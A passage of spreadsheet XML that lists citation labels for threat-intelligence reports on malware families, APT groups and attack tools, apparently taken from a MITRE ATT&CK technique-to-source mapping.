2018),(Citation: CyberBit Dtrack),(Citation: TechNet Arp),(Citation: ESET LoudMiner June 2019),(Citation: Malwarebytes Dyreza November 2015),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: CERT-FR PYSA April 2020),(Citation: TrendMicro MacOS April 2018),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Github Koadic),(Citation: ESET Operation Groundbait),(Citation: CME Github September 2018),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: SecureWorks WannaCry Analysis),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Microsoft POLONIUM June 2022),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FoxIT Wocao December 2019),(Citation: JPCert TSCookie March 2018),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: Rancor Unit42 June 2018),(Citation: Securelist Dtrack),(Citation: Unit42 BabyShark Feb 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Accenture Dragonfish Jan 2018),(Citation: Awake Security Avaddon),(Citation: BiZone Lizar May 2021),(Citation: US-CERT BADCALL),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: FireEye MuddyWater Mar 2018),(Citation: Bleeping Computer - Ryuk WoL),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Forcepoint Felismus Mar 2017),(Citation: Proofpoint TA505 October 2019),(Citation: Symantec Volgmer Aug 2014),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: CrowdStrike Ryuk January 2019),(Citation: FSecure Lokibot November 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: Gigamon Berserk Bear October 2021),(Citation: ThreatExpert Agent.btz),(Citation: Malwarebytes Higaisa 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: ESET Zebrocy May 2019),(Citation: ESET LightNeuron May 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: Trend Micro Tick November 2019),(Citation: Emissary Trojan Feb 2016),(Citation: ESET Grandoreiro April 2020),(Citation: Symantec Orangeworm April 2018),(Citation: Palo Alto MoonWind March 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Konni May 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: ESET Machete July 2019),(Citation: FireEye APT34 Dec 2017),(Citation: PWC WellMess July 2020),(Citation: ATT Sidewinder January 2021),(Citation: Novetta Blockbuster Loaders),(Citation: Symantec Waterbug Jun 2019),(Citation: GovCERT Carbon May 2016),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Palo Alto OilRig Oct 2016),(Citation: FireEye admin@338),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: CheckPoint Bandook Nov 2020),(Citation: ESET Industroyer),(Citation: GitHub Sliver Ifconfig),(Citation: Zscaler Higaisa 2020),(Citation: Debian nbtscan Nov 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: ESET Carbon Mar 2017),(Citation: McAfee Shamoon December 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Symantec Buckeye),(Citation: McAfee Oceansalt Oct 2018),(Citation: Microsoft NICKEL December 2021),(Citation: Crowdstrike Qakbot October 2020),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Palo Alto DNS Requests),(Citation: Symantec Dragonfly),(Citation: ESET DazzleSpy Jan 2022),(Citation: Antiy CERT Ramsay April 2020),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Check Point Pay2Key November 2020),(Citation: Trend Micro TeamTNT),(Citation: Unit 42 PingPull Jun 2022),(Citation: Kaspersky TajMahal April 2019),(Citation: NCSC Cyclops Blink February 2022),(Citation: GitHub PoshC2),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: McAfee Cuba April 2021),(Citation: ESET Dukes October 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: DigiTrust NanoCore Jan 2017),(Citation: S2 Grupo TrickBot June 2017),(Citation: Novetta Blockbuster),(Citation: ESET ComRAT May 2020),(Citation: AlienVault Sykipot 2011),(Citation: F-Secure The Dukes),(Citation: Kaspersky CactusPete Aug 2020),(Citation: ESET Kobalos Jan 2021),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Securelist Calisto July 2018),(Citation: Symantec W32.Duqu),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: FireEye FIN6 Apr 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Trend Micro IXESHE 2012),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: BlackBerry Amadey 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: FOX-IT May 2016 Mofang),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: ESET PipeMon May 2020),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: ASERT Donot March 2018),(Citation: Group IB GrimAgent July 2021),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Cyberreason Anchor December 2019),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: Group IB Ransomware September 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Unit42 Xbash Sept 2018),(Citation: ESET InvisiMole June 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: Forcepoint Monsoon),(Citation: Nltest Manual),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: McAfee Sharpshooter December 2018),(Citation: Kaspersky QakBot September 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Microsoft NICKEL December 2021),(Citation: Symantec Shuckworm January 2022),(Citation: Mandiant UNC3890 Aug 2022),(Citation: ESET ComRAT May 2020),(Citation: FoxIT Wocao December 2019),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: McAfee Lazarus Nov 2020),(Citation: Secureworks Karagany July 2019),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Dragos Crashoverride 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: F-Secure BlackEnergy 2014),(Citation: Talos GravityRAT),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: evolution of pirpi),(Citation: NCC Group APT15 Alive and Strong),(Citation: Kaspersky Turla),(Citation: Savill 1999),(Citation: RATANKBA),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: GitHub Sliver Netstat),(Citation: Avira Mustang Panda January 2020),(Citation: FireEye NETWIRE March 2019),(Citation: GitHub Pupy),(Citation: Palo Alto Comnie),(Citation: Trend Micro Waterbear December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Konni Aug 2021),(Citation: PWC Cloud Hopper April 2017),(Citation: Palo Alto CVE-2015-3113 July 2015),(Citation: Github PowerShell Empire),(Citation: Kaspersky Turla Aug 2014),(Citation: CME Github September 2018),(Citation: NHS Digital Egregor Nov 2020),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: Securelist Dtrack),(Citation: BiZone Lizar May 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Symantec Volgmer Aug 2014),(Citation: ESET Turla PowerShell May 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET Zebrocy May 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT34 Dec 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Machete July 2019),(Citation: GovCERT Carbon May 2016),(Citation: Kaspersky Poseidon Group),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Symantec Buckeye),(Citation: Antiy CERT Ramsay April 2020),(Citation: Trend Micro TeamTNT),(Citation: GitHub PoshC2),(Citation: McAfee Cuba April 2021),(Citation: ESET ComRAT May 2020),(Citation: AlienVault Sykipot 2011),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Talos Cobalt Strike September 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: Symantec W32.Duqu),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: FireEye APT41 Aug 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Kaspersky Adwind Feb 2016),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: CIRCL PlugX March 2013),(Citation: FOX-IT May 2016 Mofang),(Citation: Palo Alto OilRig May 2016),(Citation: FireEye APT38 Oct 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: CarbonBlack Conti July 2020),(Citation: FireEye Clandestine Fox),(Citation: TechNet Netstat),(Citation: McAfee Babuk February 2021),(Citation: McAfee Maze March 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Palo Alto Reaver Nov 2017),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: Talos ZxShell Oct 2014),(Citation: Secureworks Karagany July 2019),(Citation: Check Point APT34 April 2021),(Citation: CISA WellMail July 2020),(Citation: Carbon Black HotCroissant April 2020),(Citation: Cybereason Valak May 2020),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Prevailion EvilNum May 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: SecTools nbtscan June 2003),(Citation: BlackBerry Bahamut),(Citation: Baumgartner Naikon 2015),(Citation: APT15 Intezer June 2018),(Citation: ESET OceanLotus),(Citation: McAfee Gold Dragon),(Citation: Talos GravityRAT),(Citation: Talos PoetRAT April 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: CISA WellMess July 2020),(Citation: Lazarus APT January 2022),(Citation: fsecure NanHaiShu July 2016),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Securelist WhiteBear Aug 2017),(Citation: ClearSky Siamesekitten August 2021),(Citation: ESET RTM Feb 2017),(Citation: Fidelis njRAT June 2013),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Volexity PowerDuke November 2016),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Intrinsec Egregor Nov 2020),(Citation: Talos Oblique RAT March 2021),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Symantec Chafer Dec 2015),(Citation: Sophos New Ryuk Attack October 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: GitHub Pupy),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Profero APT27 December 2020),(Citation: Securelist Octopus Oct 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: Unit 42 VERMIN Jan 2018),(Citation: McAfee Night Dragon),(Citation: TrendMicro TropicTrooper 2015),(Citation: Fortinet Diavol July 2021),(Citation: Malwarebytes Dyreza November 2015),(Citation: Kaspersky WIRTE November 2021),(Citation: CrowdStrike BloodHound April 2018),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Github Koadic),(Citation: Kaspersky Turla Aug 2014),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Microsoft POLONIUM June 2022),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Unit42 Molerat Mar 2020),(Citation: Proofpoint TA505 Mar 2018),(Citation: Unit42 BabyShark Feb 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ESET Zebrocy Nov 2018),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Forcepoint Felismus Mar 2017),(Citation: FireEye Operation Double Tap),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Novetta Blockbuster RATs),(Citation: Cylance Shaheen Nov 2018),(Citation: CISA Zebrocy Oct 2020),(Citation: FSecure Lokibot November 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: ThreatExpert Agent.btz),(Citation: XAgentOSX 2017),(Citation: FireEye APT32 April 2020),(Citation: Palo Alto T9000 Feb 2016),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: FireEye APT32 May 2017),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: NCC Group Team9 June 2020),(Citation: Talos Group123),(Citation: Securelist Denis April 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Securelist APT10 March 2021),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Symantec Orangeworm April 2018),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Konni May 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: Prevailion DarkWatchman 2021),(Citation: FireEye APT34 Dec 2017),(Citation: ATT Sidewinder January 2021),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Novetta Blockbuster Loaders),(Citation: Unit 42 Kazuar May 2017),(Citation: FireEye FIN10 June 2017),(Citation: Palo Alto OilRig Oct 2016),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cymmetria Patchwork),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Debian nbtscan Nov 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Mandiant UNC3313 Feb 2022),(Citation: Fortinet Agent Tesla April 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ANSSI Sandworm January 2021),(Citation: McAfee Sharpshooter December 2018),(Citation: Microsoft NICKEL December 2021),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Symantec Dragonfly),(Citation: ESET DazzleSpy Jan 2022),(Citation: Fidelis Turbo),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Unit 42 MechaFlounder March 2019),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Anomali Linux Rabbit 2018),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: Novetta Blockbuster),(Citation: Talos Micropsia June 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Cobalt Group July 2018),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Sofacy Komplex Trojan),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Trend Micro IXESHE 2012),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: BlackBerry Amadey 2020),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Palo Alto OilRig May 2016),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: ASERT Donot March 2018),(Citation: Group IB GrimAgent July 2021),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Cyberreason Anchor December 2019),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: Forcepoint Monsoon),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn),(Citation: Microsoft_rec_block_rules)</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: GitHub PoshC2),(Citation: Bitdefender Naikon April 2021),(Citation: Talos ZxShell Oct 2014),(Citation: McAfee Cuba April 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Microsoft Tasklist),(Citation: Palo Alto Networks BBSRAT),(Citation: S2 Grupo TrickBot June 2017),(Citation: US-CERT Volgmer Nov 2017),(Citation: AlienVault Sykipot 2011),(Citation: Palo Alto Comnie),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: F-Secure The Dukes),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Cisco Talos Intelligence Group),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Mandiant APT1),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Intel 471 REvil March 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Talos GravityRAT),(Citation: TrendMicro EarthLusca 2022),(Citation: Malwarebytes Dyreza November 2015),(Citation: Crowdstrike Indrik November 2018),(Citation: Trend Micro Tick November 2019),(Citation: Emissary Trojan Feb 2016),(Citation: Symantec Orangeworm April 2018),(Citation: Trend Micro IXESHE 2012),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: Palo Alto OilRig May 2016),(Citation: Kaspersky Poseidon Group),(Citation: Kaspersky Turla),(Citation: Savill 1999),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: FireEye admin@338),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Unit42 Emissary Panda May 2019),(Citation: Microsoft PLATINUM April 2016),(Citation: RATANKBA),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: McAfee Babuk February 2021),(Citation: Symantec Hydraq Jan 2010),(Citation: Symantec WastedLocker June 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Intelligence Group),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: CISA AppleJeus Feb 2021),(Citation: Securelist Calisto July 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: ESET LoudMiner June 2019),(Citation: SentinelLabs reversing run-only applescripts 2021),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Symantec Hydraq Persistence Jan 2010),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Talos ZxShell Oct 2014),(Citation: GitHub PoshC2),(Citation: Talos Promethium June 2020),(Citation: US-CERT NotPetya 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: BitDefender Chafer May 2020),(Citation: cobaltstrike manual),(Citation: ESET OceanLotus Mar 2019),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Palo Alto Networks BBSRAT),(Citation: McAfee GhostSecret),(Citation: ESET Hermetic Wizard March 2022),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: GitHub Pupy),(Citation: McAfee Shamoon December19 2018),(Citation: Gh0stRAT ATT March 2019),(Citation: Talos Olympic Destroyer 2018),(Citation: SecureList Silence Nov 2017),(Citation: Medium S2W WhisperGate January 2022),(Citation: DFIR Ryuk's Return October 2020),(Citation: DFIR Ryuk in 5 Hours October 2020),(Citation: Microsoft SIR Vol 21),(Citation: xCmd),(Citation: Medium Anchor DNS July 2020),(Citation: ESET LoudMiner June 2019),(Citation: Symantec Chafer February 2018),(Citation: Github PowerShell Empire),(Citation: FireEye FIN6 Apr 2019),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Russinovich Sysinternals),(Citation: CERT-FR PYSA April 2020),(Citation: Unit 42 WhisperGate January 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Github Koadic),(Citation: Sophos Netwalker May 2020),(Citation: McAfee Honeybee),(Citation: Impacket Tools),(Citation: Novetta Winnti April 2015),(Citation: NCC Group APT15 Alive and Strong),(Citation: NCC Group WastedLocker June 2020),(Citation: Savill 1999),(Citation: RedCanary Mockingbird May 2020),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Cleaver),(Citation: Sophos Ragnar May 2020),(Citation: ESET Okrum July 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Cyberreason Anchor December 2019),(Citation: Unit42 Emissary Panda May 2019),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Microsoft Wingbird Nov 2017),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Group IB APT 41 June 2021),(Citation: Bitdefender StrongPity June 2020),(Citation: Symantec Buckeye),(Citation: Secpod Winexe June 2017),(Citation: FireEye APT41 March 2020),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: Group IB Silence Sept 2018),(Citation: Talos Nyetya June 2017),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Talos TinyTurla September 2021),(Citation: NCC Group Chimera January 2021),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: US-CERT SHARPKNOT June 2018),(Citation: Qualys Hermetic Wiper March 2022),(Citation: McAfee Shamoon December 2018),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Unit 42 Shamoon3 2018),(Citation: Talos Group123),(Citation: Sophos Maze VM September 2020),(Citation: Wired Lockergoga 2019),(Citation: Trend Micro KillDisk 2),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Cisco Ukraine Wipers January 2022),(Citation: FireEye APT38 Oct 2018),(Citation: Talos Nyetya June 2017),(Citation: Talos Olympic Destroyer 2018),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: McAfee Lazarus Nov 2020),(Citation: Unit 42 Shamoon3 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: Talos GravityRAT),(Citation: Unit42 Azorult Nov 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Proofpoint Azorult July 2018),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: ESET RTM Feb 2017),(Citation: Kaspersky Turla),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: McAfee GhostSecret),(Citation: Trend Micro Conficker),(Citation: Unit 42 OilRig Sept 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Cybereason Bazar July 2020),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: objective-see windtail1 dec 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: DFIR Conti Bazar Nov 2021),(Citation: ESET Zebrocy Nov 2018),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),(Citation: FireEye APT10 Sept 2018),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: CISA Zebrocy Oct 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Palo Alto T9000 Feb 2016),(Citation: Kaspersky StoneDrill 2017),(Citation: NCC Group Team9 June 2020),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: ATT Sidewinder January 2021),(Citation: Cyphort EvilBunny Dec 2014),(Citation: SANS Conficker),(Citation: Cybereason StrifeWater Feb 2022),(Citation: GovCERT Carbon May 2016),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Zscaler Higaisa 2020),(Citation: TechNet Net Time),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Kaspersky TajMahal April 2019),(Citation: GDATA Zeus Panda June 2017),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Kaspersky CactusPete Aug 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: JoeSecurity Egregor 2020),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Cofense Astaroth Sept 2018),(Citation: ESET PipeMon May 2020),(Citation: Unit42 BendyBear Feb 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: SecureList Griffon May 2019),(Citation: ESET InvisiMole June 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Conti Jan 2021),(Citation: Softpedia MinerC),(Citation: TrendMicro Ursnif Mar 2015),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Kaspersky Darkhotel),(Citation: CarbonBlack Conti July 2020),(Citation: ESET Gamaredon June 2020),(Citation: Cisco H1N1 Part 2),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: ESET InvisiMole June 2020),(Citation: Eset Ramsay May 2020),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008)</t>
  </si>
  <si>
